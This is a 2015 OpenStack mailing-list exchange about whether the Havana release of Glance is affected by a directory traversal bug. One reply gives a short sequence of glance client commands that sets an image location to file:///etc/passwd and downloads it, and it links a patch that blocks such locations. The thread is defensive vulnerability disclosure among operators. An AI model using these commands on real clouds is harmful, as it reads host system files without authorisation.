[Openstack-operators] glance directory traversal bug and havana

George Shuklin george.shuklin at gmail.com
Fri Jan 9 17:10:19 UTC 2015


Seems I was wrong.

Thanks, I'll look at it again.

On 01/08/2015 07:37 PM, Jesse Keating wrote:
> On 1/7/15 8:47 PM, George Shuklin wrote:
>> I spend few hours trying to backport to Havana, but than I found,  that
>> Havana seems be immune to the bug.  I'm not 100% sure, so someone else
>> advised to look too.
>>
>> The bug was that icehouse+ accepts all supported schemas. Fix excludes
>> 'bad' schemes. Although Havana have explicitly given list of accepted
>> schemes for location field, and 'bad' schemes are not in it.
>>
>
> Havana is certainly not immune. I was able to fetch content from the 
> system fairly easily.
>
> Start with an updated glance client
>
> Modify it as listed in 
> https://bugs.launchpad.net/glance/+bug/1400966/comments/6
>
> $ glance image-create --disk-format raw --container-format bare
>
> $ glance image-update --size 700 <image_id>
>
> $ glance --os-image-api-version 2 location-add --url file:///etc/passwd
>
> $ glance image-download <image_id>
>
>
> That got me (some of) the contents of /etc/passwd.
>
> The patch I posted prevented this from happening. It blocks adding a 
> location that is file:// based, but still allows other location adds 
> that should be allowed.
>
> https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496 
>
>




More information about the OpenStack-operators mailing list